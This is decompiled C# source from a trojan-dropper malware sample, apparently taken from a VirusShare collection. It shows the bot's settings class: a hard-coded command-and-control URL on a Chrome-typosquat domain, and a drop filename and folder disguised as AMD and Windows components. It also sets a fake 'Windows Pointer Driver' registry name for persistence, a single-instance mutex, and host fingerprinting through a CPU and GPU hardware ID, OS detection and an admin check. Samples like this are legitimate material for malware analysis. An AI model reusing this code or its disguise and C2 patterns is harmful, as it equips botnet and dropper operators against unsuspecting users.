// Decompiled with JetBrains decompiler // Type: Poly.Base_Settings // Assembly: Poly, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 618F3010-979B-4F78-8F99-D5C35E30AA2E // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc.exe using System; using System.Diagnostics; using System.Management; using System.Runtime.InteropServices; using System.Security.Principal; using System.Threading; namespace Poly { public class Base_Settings { private const uint LOCALE_SENGCOUNTRY = 4098; public static bool install = true; public static bool mutexRunning; public static bool captured; public static bool isAdmin; public static bool busy = false; public static string mutex0 = "0x110110xx"; public static string filePath; public static string fileName = "AMD.exe"; public static string AppDataRoam; public static string AppDataLocal; public static string FolderName = "\\WlNDOWS\\"; public static string regName = "Windows Pointer Driver"; public static string userAgent = "s00tb0t"; public static string httpURL = "http://www.chr0me.com/about.php"; public static string status; public static string pcName; public static string hwid; public static string os; public static string[] response; public static string command; public static int mode = 0; public static int interval = 40; private Mutex mutex; public static bool wait = true; public virtual void Initialise() { int num = 0; while (Base_Settings.wait) { Base_Settings.mutexRunning = this.MutexRunning(); if (num > 5) Environment.Exit(0); else if (Base_Settings.mutexRunning) { Console.WriteLine("Do shit... {0}", (object) num); Base_Settings.status = "Mutex detected"; Thread.Sleep(2000); } else if (!Base_Settings.mutexRunning) { Console.WriteLine("Shit done.. Mutex gone"); Base_Settings.status = "updated"; Base_Settings.wait = false; this.populateEnvVar(); } ++num; } } public virtual void Run() { } private void populateEnvVar() { Base_Settings.pcName = Environment.MachineName; Base_Settings.AppDataRoam = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); Base_Settings.AppDataLocal = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData); Base_Settings.isAdmin = Base_Settings.getAdminStatus(); Base_Settings.filePath = Base_Settings.AppDataLocal + Base_Settings.FolderName; this.DetectOS(); Base_Settings.hwid = this.getUniqueID(); Console.WriteLine("Successfully initialised Settings"); Console.Write("hwid is: {0}\nos is: {1}\n", (object) Base_Settings.hwid, (object) Base_Settings.os); } private bool MutexRunning() { try { this.mutex = Mutex.OpenExisting(Base_Settings.mutex0); Console.WriteLine("Mutex Detected"); return true; } catch { this.mutex = new Mutex(true, Base_Settings.mutex0); return false; } } public static bool isExePath() => !(Process.GetCurrentProcess().MainModule.FileName != Base_Settings.filePath + Base_Settings.fileName); public static bool getAdminStatus() { try { return new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator); } catch { return false; } } public string getUniqueID() => Function.MD5Hash((this.getCPUID() + this.getGraphicDevice()).ToString()); private string getCPUID() { ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_Processor WHERE DeviceID = 'CPU0'"); string empty = string.Empty; foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get()) empty = Convert.ToString(managementBaseObject["ProcessorId"]); return empty; } private string getGraphicDevice() { ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_VideoController"); string empty = string.Empty; foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get()) empty = Convert.ToString(managementBaseObject["Description"]); return empty; } private void DetectOS() { OperatingSystem osVersion = Environment.OSVersion; string str = ""; if (osVersion.Platform.ToString() == "Win32NT") { switch (Base_Settings.OSVersionNoRevision(osVersion.Version)) { case "4.1.2222": str = "Windows 98 "; break; case "4.1.2600": str = "Windows 98 SE "; break; case "4.9.3000": str = "Windows ME "; break; case "5.0.2195": str = "Windows 2000 "; break; case "5.1.2600": case "5.2.3790": str = "Windows XP "; break; case "6.0.6000": case "6.0.6001": case "6.0.6002": case "6.0.6003": str = "Windows Vista "; break; case "6.1.7600": case "6.1.7601": case "6.1.7602": case "6.1.7603": str = "Windows 7 "; break; default: str = "Unknown "; break; } } string empty = string.Empty; API.OSVERSIONINFOEX osVersionInfo = new API.OSVERSIONINFOEX(); osVersionInfo.dwOSVersionInfoSize = Marshal.SizeOf(typeof (API.OSVERSIONINFOEX)); if (API.GetVersionEx(ref osVersionInfo)) { if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP1]")) { str += "[SP1]"; if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP2]")) str += "[SP2]"; if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP3]")) str += "[SP3]"; if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP4]")) str += "[SP4]"; if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP5]")) str += "[SP5]"; if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP6]")) str += "[SP6]"; if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP7]")) str += "[SP7]"; if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP8]")) str += "[SP8]"; if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP9]")) str += "[SP9]"; } Base_Settings.os = !Base_Settings.is64Bit() ? str + "(32-bit)" : str + "(64-bit)"; } else Base_Settings.os = str; } private static string OSVersionNoRevision(Version ver) => ver.Major.ToString() + "." + ver.Minor.ToString() + "." + ver.Build.ToString(); public static void cleanUp() => Environment.Exit(0); private static bool is64Bit() { try { return !string.IsNullOrEmpty(Environment.GetEnvironmentVariable("ProgramW6432")); } catch { return false; } } public static string GetLocale() => API.GetInfo(4098U); } }